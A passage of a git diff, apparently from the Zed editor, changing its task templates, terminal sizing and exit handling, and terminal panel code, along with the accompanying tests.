serde_json::Value { let schema = schemars::generate::SchemaSettings::draft2019_09() @@ -270,6 +298,7 @@ impl TaskTemplate { show_summary: self.show_summary, show_command: self.show_command, show_rerun: true, + save: self.save, }, }) } @@ -1071,7 +1100,6 @@ mod tests { command, ..TaskTemplate::default() }; - assert!(task.unknown_variables().is_empty()); } } diff --git a/crates/tasks_ui/src/modal.rs b/crates/tasks_ui/src/modal.rs index 6b4fc21ef3ede0482c9eb3ac6b8dd9c000b7f7d4..285a07c9562849b26b4cbba3de3979614384d875 100644 --- a/crates/tasks_ui/src/modal.rs +++ b/crates/tasks_ui/src/modal.rs @@ -184,23 +184,11 @@ impl TasksModal { }; let mut new_candidates = used_tasks; new_candidates.extend(lsp_tasks); - let hide_vscode = current_resolved_tasks.iter().any(|(kind, _)| match kind { - TaskSourceKind::Worktree { - id: _, - directory_in_worktree: dir, - id_base: _, - } => dir.file_name().is_some_and(|name| name == ".zed"), - _ => false, - }); // todo(debugger): We're always adding lsp tasks here even if prefer_lsp is false // We should move the filter to new_candidates instead of on current // and add a test for this new_candidates.extend(current_resolved_tasks.into_iter().filter(|(task_kind, _)| { match task_kind { - TaskSourceKind::Worktree { - directory_in_worktree: dir, - .. - } => !(hide_vscode && dir.file_name().is_some_and(|name| name == ".vscode")), TaskSourceKind::Language { .. } => add_current_language_tasks, _ => true, } @@ -582,7 +570,7 @@ impl PickerDelegate for TasksModalDelegate { Tooltip::simple("Delete Previously Scheduled Task", cx) }), ); - item.end_hover_slot(delete_button) + item.end_slot_on_hover(delete_button) } else { item } diff --git a/crates/tasks_ui/src/tasks_ui.rs b/crates/tasks_ui/src/tasks_ui.rs index 29e6a9de7fab9b5421fe38fee0fd24fd43b12ccc..ca8ebb5248e4e6d77a05efab8d43dbfbd8d02eca 100644 --- a/crates/tasks_ui/src/tasks_ui.rs +++ b/crates/tasks_ui/src/tasks_ui.rs @@ -204,19 +204,19 @@ where else { return Task::ready(Vec::new()); }; - let (file, language) = task_contexts + let (language, buffer) = task_contexts .location() .map(|location| { - let buffer = location.buffer.read(cx); + let buffer = location.buffer.clone(); ( - buffer.file().cloned(), - buffer.language_at(location.range.start), + buffer.read(cx).language_at(location.range.start), + Some(buffer), ) }) .unwrap_or_default(); task_inventory .read(cx) - .list_tasks(file, language, task_contexts.worktree(), cx) + .list_tasks(buffer, language, task_contexts.worktree(), cx) })? .await; @@ -316,16 +316,16 @@ pub fn task_contexts( let lsp_task_sources = active_editor .as_ref() - .map(|active_editor| active_editor.update(cx, |editor, cx| editor.lsp_task_sources(cx))) + .map(|active_editor| { + active_editor.update(cx, |editor, cx| editor.lsp_task_sources(false, false, cx)) + }) .unwrap_or_default(); - let latest_selection = active_editor.as_ref().map(|active_editor| { - active_editor - .read(cx) - .selections - .newest_anchor() - .head() - .text_anchor + let latest_selection = active_editor.as_ref().and_then(|active_editor| { + let snapshot = active_editor.read(cx).buffer().read(cx).snapshot(cx); + snapshot + .anchor_to_buffer_anchor(active_editor.read(cx).selections.newest_anchor().head()) + .map(|(anchor, _)| anchor) }); let mut worktree_abs_paths = workspace @@ -434,10 +434,15 @@ mod tests { ) .await; let project = Project::test(fs, [path!("/dir").as_ref()], cx).await; - let worktree_store = project.read_with(cx, |project, _| project.worktree_store()); + let (worktree_store, git_store) = project.read_with(cx, |project, _| { + (project.worktree_store(), project.git_store().clone()) + }); let rust_language = Arc::new( Language::new( - LanguageConfig::default(), + LanguageConfig { + name: "Rust".into(), + ..Default::default() + }, Some(tree_sitter_rust::LANGUAGE.into()), ) .with_outline_query( @@ -448,12 +453,16 @@ mod tests { .unwrap() .with_context_provider(Some(Arc::new(BasicContextProvider::new( worktree_store.clone(), + git_store.clone(), )))), ); let typescript_language = Arc::new( Language::new( - LanguageConfig::default(), + LanguageConfig { + name: "TypeScript".into(), + ..Default::default() + }, Some(tree_sitter_typescript::LANGUAGE_TYPESCRIPT.into()), ) .with_outline_query( @@ -468,6 +477,7 @@ mod tests { .unwrap() .with_context_provider(Some(Arc::new(BasicContextProvider::new( worktree_store.clone(), + git_store.clone(), )))), ); @@ -532,6 +542,7 @@ mod tests { (VariableName::WorktreeRoot, path!("/dir").into()), (VariableName::Row, "1".into()), (VariableName::Column, "1".into()), + (VariableName::Language, "Rust".into()), ]), project_env: HashMap::default(), } @@ -566,6 +577,7 @@ mod tests { (VariableName::Column, "15".into()), (VariableName::SelectedText, "is_i".into()), (VariableName::Symbol, "this_is_a_rust_file".into()), + (VariableName::Language, "Rust".into()), ]), project_env: HashMap::default(), } @@ -594,6 +606,7 @@ mod tests { (VariableName::Row, "1".into()), (VariableName::Column, "1".into()), (VariableName::Symbol, "this_is_a_test".into()), + (VariableName::Language, "TypeScript".into()), ]), project_env: HashMap::default(), } diff --git a/crates/terminal/Cargo.toml b/crates/terminal/Cargo.toml index ee29546b81c32038e85805850bc07111fca81af7..8a598c1d7730ef59c19085f73cc65bd955ad4e35 100644 --- a/crates/terminal/Cargo.toml +++ b/crates/terminal/Cargo.toml @@ -37,6 +37,7 @@ sysinfo.workspace = true smol.workspace = true task.workspace = true theme.workspace = true +theme_settings.workspace = true thiserror.workspace = true url.workspace = true util.workspace = true @@ -49,6 +50,5 @@ windows.workspace = true [dev-dependencies] gpui = { workspace = true, features = ["test-support"] } rand.workspace = true -serde_json.workspace = true settings = { workspace = true, features = ["test-support"] } util_macros.workspace = true diff --git a/crates/terminal/src/pty_info.rs b/crates/terminal/src/pty_info.rs index 2663095c52f386cfd9528f1c96fa32a39abd9a59..7b6676760ca61c1cfde22601d0c0eb0b9641b42a 100644 --- a/crates/terminal/src/pty_info.rs +++ b/crates/terminal/src/pty_info.rs @@ -36,11 +36,19 @@ impl ProcessIdGetter { } fn pid(&self) -> Option { + // Negative pid means error. + // Zero pid means no foreground process group is set on the PTY yet. + // Avoid killing the current process by returning a zero pid. let pid = unsafe { libc::tcgetpgrp(self.handle) }; - if pid < 0 { + if pid > 0 { + return Some(Pid::from_u32(pid as u32)); + } + + if self.fallback_pid > 0 { return Some(Pid::from_u32(self.fallback_pid)); } - Some(Pid::from_u32(pid as u32)) + + None } } diff --git a/crates/terminal/src/terminal.rs b/crates/terminal/src/terminal.rs index 0fa3b37e1501ed6407d18b07e0b2188ce5e77cf7..b620f5f03c2debf19cdc4856da8c039fe690651f 100644 --- a/crates/terminal/src/terminal.rs +++ b/crates/terminal/src/terminal.rs @@ -207,11 +207,16 @@ impl TerminalBounds { } pub fn num_lines(&self) -> usize { - (self.bounds.size.height / self.line_height).floor() as usize + // Tolerance to prevent f32 precision from losing a row: + // `N * line_height / line_height` can be N-epsilon, which floor() + // would round down, pushing the first line into invisible scrollback. + let raw = self.bounds.size.height / self.line_height; + raw.next_up().floor() as usize } pub fn num_columns(&self) -> usize { - (self.bounds.size.width / self.cell_width).floor() as usize + let raw = self.bounds.size.width / self.cell_width; + raw.next_up().floor() as usize } pub fn height(&self) -> Pixels { @@ -412,9 +417,12 @@ impl TerminalBuilder { window_id, }, child_exited: None, + keyboard_input_sent: false, event_loop_task: Task::ready(Ok(())), background_executor: background_executor.clone(), path_style, + #[cfg(any(test, feature = "test-support"))] + input_log: Vec::new(), }; Ok(TerminalBuilder { @@ -643,9 +651,12 @@ impl TerminalBuilder { window_id, }, child_exited: None, + keyboard_input_sent: false, event_loop_task: Task::ready(Ok(())), background_executor, path_style, + #[cfg(any(test, feature = "test-support"))] + input_log: Vec::new(), }; if !activation_script.is_empty() && no_task { @@ -867,9 +878,12 @@ pub struct Terminal { template: CopyTemplate, activation_script: Vec, child_exited: Option, + keyboard_input_sent: bool, event_loop_task: Task>, background_executor: BackgroundExecutor, path_style: PathStyle, + #[cfg(any(test, feature = "test-support"))] + input_log: Vec>, } struct CopyTemplate { @@ -1451,9 +1465,19 @@ impl Terminal { .push_back(InternalEvent::Scroll(AlacScroll::Bottom)); self.events.push_back(InternalEvent::SetSelection(None)); + self.keyboard_input_sent = true; + let input = input.into(); + #[cfg(any(test, feature = "test-support"))] + self.input_log.push(input.to_vec()); + self.write_to_pty(input); } + #[cfg(any(test, feature = "test-support"))] + pub fn take_input_log(&mut self) -> Vec> { + std::mem::take(&mut self.input_log) + } + pub fn toggle_vi_mode(&mut self) { self.events.push_back(InternalEvent::ToggleViMode); } @@ -1925,7 +1949,7 @@ impl Terminal { MouseButton::Middle => { if let Some(item) = _cx.read_from_primary() { let text = item.text().unwrap_or_default(); - self.input(text.into_bytes()); + self.paste(&text); } } _ => {} @@ -2225,7 +2249,17 @@ impl Terminal { let task = match &mut self.task { Some(task) => task, None => { - if self.child_exited.is_none_or(|e| e.code() == Some(0)) { + // For interactive shells (no task), we need to differentiate: + // 1. User-initiated exits (typed "exit", Ctrl+D, etc.) - always close, + // even if the shell exits with a non-zero code (e.g. after `false`). + // 2. Shell spawn failures (bad $SHELL) - don't close, so the user sees + // the error. Spawn failures never receive keyboard input. + let should_close = if self.keyboard_input_sent { + true + } else { + self.child_exited.is_none_or(|e| e.code() == Some(0)) + }; + if should_close { cx.emit(Event::CloseTerminal); } return; @@ -2536,16 +2570,16 @@ mod tests { Point, TestAppContext, bounds, point, size, }; use parking_lot::Mutex; - use rand::{Rng, distr, rngs::ThreadRng}; + use rand::{Rng, distr, rngs::StdRng}; use smol::channel::Receiver; use task::{Shell, ShellBuilder}; - #[cfg(target_os = "macos")] + #[cfg(not(target_os = "windows"))] fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { let settings_store = settings::SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); } @@ -2775,6 +2809,68 @@ mod tests { ); } + #[cfg(not(target_os = "windows"))] + #[gpui::test(iterations = 10)] + async fn test_terminal_closes_after_nonzero_exit(cx: &mut TestAppContext) { + init_test(cx); + + cx.executor().allow_parking(); + + let builder = cx + .update(|cx| { + TerminalBuilder::new( + None, + None, + task::Shell::System, + HashMap::default(), + CursorShape::default(), + AlternateScroll::On, + None, + vec![], + 0, + false, + 0, + None, + cx, + Vec::new(), + PathStyle::local(), + ) + }) + .await + .unwrap(); + let terminal = cx.new(|cx| builder.subscribe(cx)); + + let (event_tx, event_rx) = smol::channel::unbounded::(); + cx.update(|cx| { + cx.subscribe(&terminal, move |_, e, _| { + event_tx.send_blocking(e.clone()).unwrap(); + }) + }) + .detach(); + + let first_event = event_rx.recv().await.expect("No wakeup event received"); + + terminal.update(cx, |terminal, _| { + terminal.input(b"false\r".to_vec()); + }); + cx.executor().timer(Duration::from_millis(500)).await; + terminal.update(cx, |terminal, _| { + terminal.input(b"exit\r".to_vec()); + }); + + let mut all_events = vec![first_event]; + while let Ok(new_event) = event_rx.recv().await { + all_events.push(new_event.clone()); + if new_event == Event::CloseTerminal { + break; + } + } + assert!( + all_events.contains(&Event::CloseTerminal), + "Shell exiting after `false && exit` should close terminal, but got events: {all_events:?}", + ); + } + #[gpui::test(iterations = 10)] async fn test_terminal_no_exit_on_spawn_failure(cx: &mut TestAppContext) { cx.executor().allow_parking(); @@ -2857,9 +2953,8 @@ mod tests { } } - #[test] - fn test_mouse_to_cell_test() { - let mut rng = rand::rng(); + #[gpui::test] + fn test_mouse_to_cell_test(mut rng: StdRng) { const ITERATIONS: usize = 10; const PRECISION: usize = 1000; @@ -2907,10 +3002,8 @@ mod tests { } } - #[test] - fn test_mouse_to_cell_clamp() { - let mut rng = rand::rng(); - + #[gpui::test] + fn test_mouse_to_cell_clamp(mut rng: StdRng) { let size = crate::TerminalBounds { cell_width: Pixels::from(10.), line_height: Pixels::from(10.), @@ -2941,12 +3034,12 @@ mod tests { ); } - fn get_cells(size: TerminalBounds, rng: &mut ThreadRng) -> Vec> { + fn get_cells(size: TerminalBounds, rng: &mut StdRng) -> Vec> { let mut cells = Vec::new(); - for _ in 0..((size.height() / size.line_height()) as usize) { + for _ in 0..size.num_lines() { let mut row_vec = Vec::new(); - for _ in 0..((size.width() / size.cell_width()) as usize) { + for _ in 0..size.num_columns() { let cell_char = rng.sample(distr::Alphanumeric) as char; row_vec.push(cell_char) } @@ -3349,5 +3442,59 @@ mod tests { scroll_by(-1); } } + + #[test] + fn test_num_lines_float_precision() { + let line_heights = [ + 20.1f32, 16.7, 18.3, 22.9, 14.1, 15.6, 17.8, 19.4, 21.3, 23.7, + ]; + for &line_height in &line_heights { + for n in 1..=100 { + let height = n as f32 * line_height; + let bounds = TerminalBounds::new( + px(line_height), + px(8.0), + Bounds { + origin: Point::default(), + size: Size { + width: px(800.0), + height: px(height), + }, + }, + ); + assert_eq!( + bounds.num_lines(), + n, + "num_lines() should be {n} for height={height}, line_height={line_height}" + ); + } + } + } + + #[test] + fn test_num_columns_float_precision() { + let cell_widths = [8.1f32, 7.3, 9.7, 6.9, 10.1]; + for &cell_width in &cell_widths { + for n in 1..=200 { + let width = n as f32 * cell_width; + let bounds = TerminalBounds::new( + px(20.0), + px(cell_width), + Bounds { + origin: Point::default(), + size: Size { + width: px(width), + height: px(400.0), + }, + }, + ); + assert_eq!( + bounds.num_columns(), + n, + "num_columns() should be {n} for width={width}, cell_width={cell_width}" + ); + } + } + } } } diff --git a/crates/terminal/src/terminal_hyperlinks.rs b/crates/terminal/src/terminal_hyperlinks.rs index d239f680f9e2ecbd3d320e731d3cc74303a552ed..0ca6cb2edd916019a4a7822830faa1fdfaa238f3 100644 --- a/crates/terminal/src/terminal_hyperlinks.rs +++ b/crates/terminal/src/terminal_hyperlinks.rs @@ -905,6 +905,18 @@ mod tests { ); } + #[test] + // + fn issue_50531() { + // Paths preceded by "N:" prefix (e.g. grep output line numbers) + // should still be clickable + test_path!("0: ‹«foo/👉bar.txt»›"); + test_path!("0: ‹«👉foo/bar.txt»›"); + test_path!("42: ‹«👉foo/bar.txt»›"); + test_path!("1: ‹«/👉test/cool.rs»›"); + test_path!("1: ‹«/👉test/cool.rs»:«4»:«2»›"); + } + #[test] // fn issue_46795() { diff --git a/crates/terminal/src/terminal_settings.rs b/crates/terminal/src/terminal_settings.rs index 45f22319869381ae497e64c2f8e65abed6fe9d69..ec784d466b1f97ba2e44231aaef7475d62981479 100644 --- a/crates/terminal/src/terminal_settings.rs +++ b/crates/terminal/src/terminal_settings.rs @@ -14,7 +14,7 @@ use settings::{ merge_from::MergeFrom, }; use task::Shell; -use theme::FontFamilyName; +use theme_settings::FontFamilyName; #[derive(Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] pub struct Toolbar { @@ -40,6 +40,7 @@ pub struct TerminalSettings { pub keep_selection_on_copy: bool, pub button: bool, pub dock: TerminalDockPosition, + pub flexible: bool, pub default_width: Pixels, pub default_height: Pixels, pub detect_venv: VenvSettings, @@ -50,6 +51,7 @@ pub struct TerminalSettings { pub minimum_contrast: f32, pub path_hyperlink_regexes: Vec, pub path_hyperlink_timeout_ms: u64, + pub show_count_badge: bool, } #[derive(Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] @@ -109,6 +111,7 @@ impl settings::Settings for TerminalSettings { dock: user_content.dock.unwrap(), default_width: px(user_content.default_width.unwrap()), default_height: px(user_content.default_height.unwrap()), + flexible: user_content.flexible.unwrap(), detect_venv: project_content.detect_venv.unwrap(), scroll_multiplier: user_content.scroll_multiplier.unwrap(), max_scroll_history_lines: user_content.max_scroll_history_lines, @@ -129,6 +132,7 @@ impl settings::Settings for TerminalSettings { }) .collect(), path_hyperlink_timeout_ms: project_content.path_hyperlink_timeout_ms.unwrap(), + show_count_badge: user_content.show_count_badge.unwrap(), } } } diff --git a/crates/terminal_view/Cargo.toml b/crates/terminal_view/Cargo.toml index ef31480341ddc873e00612b471217899836a3bd1..f74d8b83883a1186d91855429c40f375bfa22526 100644 --- a/crates/terminal_view/Cargo.toml +++ b/crates/terminal_view/Cargo.toml @@ -18,7 +18,6 @@ doctest = false [dependencies] anyhow.workspace = true async-recursion.workspace = true -assistant_slash_command.workspace = true breadcrumbs.workspace = true collections.workspace = true db.workspace = true @@ -42,17 +41,17 @@ settings.workspace = true shellexpand.workspace = true terminal.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true workspace.workspace = true zed_actions.workspace = true [dev-dependencies] -client = { workspace = true, features = ["test-support"] } editor = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } project = { workspace = true, features = ["test-support"] } -rand.workspace = true +terminal = { workspace = true, features = ["test-support"] } workspace = { workspace = true, features = ["test-support"] } [package.metadata.cargo-machete] diff --git a/crates/terminal_view/src/persistence.rs b/crates/terminal_view/src/persistence.rs index 1c215c1703278c8e54046ea305273242570c6b7f..50b1e350fa91a4936691b5a35efe0a1666aba9cc 100644 --- a/crates/terminal_view/src/persistence.rs +++ b/crates/terminal_view/src/persistence.rs @@ -6,7 +6,7 @@ use gpui::{AppContext as _, AsyncWindowContext, Axis, Entity, Task, WeakEntity}; use project::Project; use serde::{Deserialize, Serialize}; use std::path::PathBuf; -use ui::{App, Context, Pixels, Window}; +use ui::{App, Context, Window}; use util::ResultExt as _; use db::{ @@ -97,12 +97,7 @@ pub(crate) fn deserialize_terminal_panel( ) -> Task>> { window.spawn(cx, async move |cx| { let terminal_panel = workspace.update_in(cx, |workspace, window, cx| { - cx.new(|cx| { - let mut panel = TerminalPanel::new(workspace, window, cx); - panel.height = serialized_panel.height.map(|h| h.round()); - panel.width = serialized_panel.width.map(|w| w.round()); - panel - }) + cx.new(|cx| TerminalPanel::new(workspace, window, cx)) })?; match &serialized_panel.items { SerializedItems::NoSplits(item_ids) => { @@ -317,8 +312,6 @@ pub(crate) struct SerializedTerminalPanel { pub items: SerializedItems, // A deprecated field, kept for backwards compatibility for the code before terminal splits were introduced. pub active_item_id: Option, - pub width: Option, - pub height: Option, } #[derive(Debug, Serialize, Deserialize)] @@ -425,7 +418,7 @@ impl Domain for TerminalDb { ]; } -db::static_connection!(TERMINAL_DB, TerminalDb, [WorkspaceDb]); +db::static_connection!(TerminalDb, [WorkspaceDb]); impl TerminalDb { query! { diff --git a/crates/terminal_view/src/terminal_element.rs b/crates/terminal_view/src/terminal_element.rs index dc01a05dbe0c9c04398afc47a5cae1c2bd7b4e5d..0bb0837c6edb926cdcda70a54889de313cbe94f1 100644 --- a/crates/terminal_view/src/terminal_element.rs +++ b/crates/terminal_view/src/terminal_element.rs @@ -25,7 +25,8 @@ use terminal::{ }, terminal_settings::TerminalSettings, }; -use theme::{ActiveTheme, Theme, ThemeSettings}; +use theme::{ActiveTheme, Theme}; +use theme_settings::ThemeSettings; use ui::utils::ensure_minimum_contrast; use ui::{ParentElement, Tooltip}; use util::ResultExt; @@ -913,7 +914,9 @@ impl Element for TerminalElement { } TerminalMode::Standalone => terminal_settings .font_size - .map_or(buffer_font_size, |size| theme::adjusted_font_size(size, cx)), + .map_or(buffer_font_size, |size| { + theme_settings::adjusted_font_size(size, cx) + }), }; let theme = cx.theme().clone(); diff --git a/crates/terminal_view/src/terminal_panel.rs b/crates/terminal_view/src/terminal_panel.rs index 88bde3c771f72a0771a405cfbf123ac4e2286ad9..a813a1adc55fe5de75f5d9547839b15eb391192e 100644 --- a/crates/terminal_view/src/terminal_panel.rs +++ b/crates/terminal_view/src/terminal_panel.rs @@ -1,4 +1,4 @@ -use std::{cmp, ops::ControlFlow, path::PathBuf, process::ExitStatus, sync::Arc, time::Duration}; +use std::{cmp, path::PathBuf, process::ExitStatus, sync::Arc, time::Duration}; use crate::{ TerminalView, default_working_directory, @@ -8,15 +8,15 @@ use crate::{ }; use breadcrumbs::Breadcrumbs; use collections::HashMap; -use db::kvp::KEY_VALUE_STORE; +use db::kvp::KeyValueStore; use futures::{channel::oneshot, future::join_all}; use gpui::{ Action, AnyView, App, AsyncApp, AsyncWindowContext, Context, Corner, Entity, EventEmitter, - ExternalPaths, FocusHandle, Focusable, IntoElement, ParentElement, Pixels, Render, Styled, - Task, WeakEntity, Window, actions, + FocusHandle, Focusable, IntoElement, ParentElement, Pixels, Render, Styled, Task, WeakEntity, + Window, actions, }; use itertools::Itertools; -use project::{Fs, Project, ProjectEntryId}; +use project::{Fs, Project}; use settings::{Settings, TerminalDockPosition}; use task::{RevealStrategy, RevealTarget, Shell, ShellBuilder, SpawnInTerminal, TaskId}; @@ -28,13 +28,13 @@ use ui::{ use util::{ResultExt, TryFutureExt}; use workspace::{ ActivateNextPane, ActivatePane, ActivatePaneDown, ActivatePaneLeft, ActivatePaneRight, - ActivatePaneUp, ActivatePreviousPane, DraggedSelection, DraggedTab, ItemId, MoveItemToPane, + ActivatePaneUp, ActivatePreviousPane, DraggedTab, ItemId, MoveItemToPane, MoveItemToPaneInDirection, MovePaneDown, MovePaneLeft, MovePaneRight, MovePaneUp, Pane, PaneGroup, SplitDirection, SplitDown, SplitLeft, SplitMode, SplitRight, SplitUp, SwapPaneDown, SwapPaneLeft, SwapPaneRight, SwapPaneUp, ToggleZoom, Workspace, dock::{DockPosition, Panel, PanelEvent, PanelHandle}, item::SerializableItem, - move_active_item, move_item, pane, + move_active_item, pane, }; use anyhow::{Result, anyhow}; @@ -79,8 +79,6 @@ pub struct TerminalPanel { pub(crate) center: PaneGroup, fs: Arc, workspace: WeakEntity, - pub(crate) width: Option, - pub(crate) height: Option, pending_serialization: Task>, pending_terminals_to_add: usize, deferred_tasks: HashMap>, @@ -100,8 +98,6 @@ impl TerminalPanel { fs: workspace.app_state().fs.clone(), workspace: workspace.weak_handle(), pending_serialization: Task::ready(None), - width: None, - height: None, pending_terminals_to_add: 0, deferred_tasks: HashMap::default(), assistant_enabled: false, @@ -133,7 +129,11 @@ impl TerminalPanel { } } - fn apply_tab_bar_buttons(&self, terminal_pane: &Entity, cx: &mut Context) { + pub(crate) fn apply_tab_bar_buttons( + &self, + terminal_pane: &Entity, + cx: &mut Context, + ) { let assistant_tab_bar_button = self.assistant_tab_bar_button.clone(); terminal_pane.update(cx, |pane, cx| { pane.set_render_tab_bar_buttons(cx, move |pane, window, cx| { @@ -246,16 +246,17 @@ impl TerminalPanel { ) -> Result> { let mut terminal_panel = None; - if let Some((database_id, serialization_key)) = workspace - .read_with(&cx, |workspace, _| { + if let Some((database_id, serialization_key, kvp)) = workspace + .read_with(&cx, |workspace, cx| { workspace .database_id() .zip(TerminalPanel::serialization_key(workspace)) + .map(|(id, key)| (id, key, KeyValueStore::global(cx))) }) .ok() .flatten() && let Some(serialized_panel) = cx - .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) }) + .background_spawn(async move { kvp.read_kvp(&serialization_key) }) .await .log_err() .flatten() @@ -652,6 +653,27 @@ impl TerminalPanel { window: &mut Window, cx: &mut Context, ) { + let center_pane = workspace.active_pane(); + let center_pane_has_focus = center_pane.focus_handle(cx).contains_focused(window, cx); + let active_center_item_is_terminal = center_pane + .read(cx) + .active_item() + .is_some_and(|item| item.downcast::().is_some()); + + if center_pane_has_focus && active_center_item_is_terminal { + let working_directory = default_working_directory(workspace, cx); + let local = action.local; + Self::add_center_terminal(workspace, window, cx, move |project, cx| { + if local { + project.create_local_terminal(cx) + } else { + project.create_terminal_shell(working_directory, cx) + } + }) + .detach_and_log_err(cx); + return; + } + let Some(terminal_panel) = workspace.panel::(cx) else { return; }; @@ -923,8 +945,6 @@ impl TerminalPanel { } fn serialize(&mut self, cx: &mut Context) { - let height = self.height; - let width = self.width; let Some(serialization_key) = self .workspace .read_with(cx, |workspace, _| { @@ -935,6 +955,7 @@ impl TerminalPanel { else { return; }; + let kvp = KeyValueStore::global(cx); self.pending_serialization = cx.spawn(async move |terminal_panel, cx| { cx.background_executor() .timer(Duration::from_millis(50)) @@ -949,17 +970,14 @@ impl TerminalPanel { }); cx.background_spawn( async move { - KEY_VALUE_STORE - .write_kvp( - serialization_key, - serde_json::to_string(&SerializedTerminalPanel { - items, - active_item_id: None, - height, - width, - })?, - ) - .await?; + kvp.write_kvp( + serialization_key, + serde_json::to_string(&SerializedTerminalPanel { + items, + active_item_id: None, + })?, + ) + .await?; anyhow::Ok(()) } .log_err(), @@ -1187,7 +1205,6 @@ pub fn new_terminal_pane( window: &mut Window, cx: &mut Context, ) -> Entity { - let is_local = project.read(cx).is_local(); let terminal_panel = cx.entity(); let pane = cx.new(|cx| { let mut pane = Pane::new( @@ -1245,113 +1262,6 @@ pub fn new_terminal_pane( toolbar.add_item(breadcrumbs, window, cx); }); - let drop_closure_project = project.downgrade(); - let drop_closure_terminal_panel = terminal_panel.downgrade(); - pane.set_custom_drop_handle(cx, move |pane, dropped_item, window, cx| { - let Some(project) = drop_closure_project.upgrade() else { - return ControlFlow::Break(()); - }; - if let Some(tab) = dropped_item.downcast_ref::() { - let this_pane = cx.entity(); - let item = if tab.pane == this_pane { - pane.item_for_index(tab.ix) - } else { - tab.pane.read(cx).item_for_index(tab.ix) - }; - if let Some(item) = item { - if item.downcast::().is_some() { - let source = tab.pane.clone(); - let item_id_to_move = item.item_id(); - - // If no split direction, let the regular pane drop handler take care of it - let Some(split_direction) = pane.drag_split_direction() else { - return ControlFlow::Continue(()); - }; - - // Gather data synchronously before deferring - let is_zoomed = drop_closure_terminal_panel - .upgrade() - .map(|terminal_panel| { - let terminal_panel = terminal_panel.read(cx); - if terminal_panel.active_pane == this_pane { - pane.is_zoomed() - } else { - terminal_panel.active_pane.read(cx).is_zoomed() - } - }) - .unwrap_or(false); - - let workspace = workspace.clone(); - let terminal_panel = drop_closure_terminal_panel.clone(); - - // Defer the split operation to avoid re-entrancy panic. - // The pane may be the one currently being updated, so we cannot - // call mark_positions (via split) synchronously. - cx.spawn_in(window, async move |_, cx| { - cx.update(|window, cx| { - let Ok(new_pane) = - terminal_panel.update(cx, |terminal_panel, cx| { - let new_pane = new_terminal_pane( - workspace, project, is_zoomed, window, cx, - ); - terminal_panel.apply_tab_bar_buttons(&new_pane, cx); - terminal_panel.center.split( - &this_pane, - &new_pane, - split_direction, - cx, - ); - new_pane - }) - else { - return; - }; - - move_item( - &source, - &new_pane, - item_id_to_move, - new_pane.read(cx).active_item_index(), - true, - window, - cx, - ); - }) - .ok(); - }) - .detach(); - } else if let Some(project_path) = item.project_path(cx) - && let Some(entry_path) = project.read(cx).absolute_path(&project_path, cx) - { - add_paths_to_terminal(pane, &[entry_path], window, cx); - } - } - } else if let Some(selection) = dropped_item.downcast_ref::() { - let project = project.read(cx); - let paths_to_add = selection - .items() - .map(|selected_entry| selected_entry.entry_id) - .filter_map(|entry_id| project.path_for_entry(entry_id, cx)) - .filter_map(|project_path| project.absolute_path(&project_path, cx)) - .collect::>(); - if !paths_to_add.is_empty() { - add_paths_to_terminal(pane, &paths_to_add, window, cx); - } - } else if let Some(&entry_id) = dropped_item.downcast_ref::() { - if let Some(entry_path) = project - .read(cx) - .path_for_entry(entry_id, cx) - .and_then(|project_path| project.read(cx).absolute_path(&project_path, cx)) - { - add_paths_to_terminal(pane, &[entry_path], window, cx); - } - } else if is_local && let Some(paths) = dropped_item.downcast_ref::() { - add_paths_to_terminal(pane, paths.paths(), window, cx); - } - - ControlFlow::Break(()) - }); - pane }); @@ -1376,27 +1286,6 @@ async fn wait_for_terminals_tasks( join_all(pending_tasks).await; } -fn add_paths_to_terminal( - pane: &mut Pane, - paths: &[PathBuf], - window: &mut Window, - cx: &mut Context, -) { - if let Some(terminal_view) = pane - .active_item() - .and_then(|item| item.downcast::()) - { - window.focus(&terminal_view.focus_handle(cx), cx); - let mut new_text = paths.iter().map(|path| format!(" {path:?}")).join(""); - new_text.push(' '); - terminal_view.update(cx, |terminal_view, cx| { - terminal_view.terminal().update(cx, |terminal, _| { - terminal.paste(&new_text); - }); - }); - } -} - struct FailedToSpawnTerminal { error: String, focus_handle: FocusHandle, @@ -1677,25 +1566,26 @@ impl Panel for TerminalPanel { }); } - fn size(&self, window: &Window, cx: &App) -> Pixels { + fn default_size(&self, window: &Window, cx: &App) -> Pixels { let settings = TerminalSettings::get_global(cx); match self.position(window, cx) { - DockPosition::Left | DockPosition::Right => { - self.width.unwrap_or(settings.default_width) - } - DockPosition::Bottom => self.height.unwrap_or(settings.default_height), + DockPosition::Left | DockPosition::Right => settings.default_width, + DockPosition::Bottom => settings.default_height, } } - fn set_size(&mut self, size: Option, window: &mut Window, cx: &mut Context) { - match self.position(window, cx) { - DockPosition::Left | DockPosition::Right => self.width = size, - DockPosition::Bottom => self.height = size, - } - cx.notify(); - cx.defer_in(window, |this, _, cx| { - this.serialize(cx); - }) + fn supports_flexible_size(&self) -> bool { + true + } + + fn has_flexible_size(&self, _window: &Window, cx: &App) -> bool { + TerminalSettings::get_global(cx).flexible + } + + fn set_flexible_size(&mut self, flexible: bool, _window: &mut Window, cx: &mut Context) { + settings::update_settings_file(self.fs.clone(), cx, move |settings, _| { + settings.terminal.get_or_insert_default().flexible = Some(flexible); + }); } fn is_zoomed(&self, _window: &Window, cx: &App) -> bool { @@ -1731,6 +1621,9 @@ impl Panel for TerminalPanel { } fn icon_label(&self, _window: &Window, cx: &App) -> Option { + if !TerminalSettings::get_global(cx).show_count_badge { + return None; + } let count = self .center .panes() @@ -1767,7 +1660,7 @@ impl Panel for TerminalPanel { } fn toggle_action(&self) -> Box { - Box::new(ToggleFocus) + Box::new(Toggle) } fn pane(&self) -> Option> { @@ -1775,7 +1668,7 @@ impl Panel for TerminalPanel { } fn activation_priority(&self) -> u32 { - 1 + 2 } } @@ -2025,6 +1918,436 @@ mod tests { ); } + async fn init_workspace_with_panel( + cx: &mut TestAppContext, + ) -> (gpui::WindowHandle, Entity) { + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, [], cx).await; + let window_handle = + cx.add_window(|window, cx| MultiWorkspace::test_new(project, window, cx)); + + let terminal_panel = window_handle + .update(cx, |multi_workspace, window, cx| { + 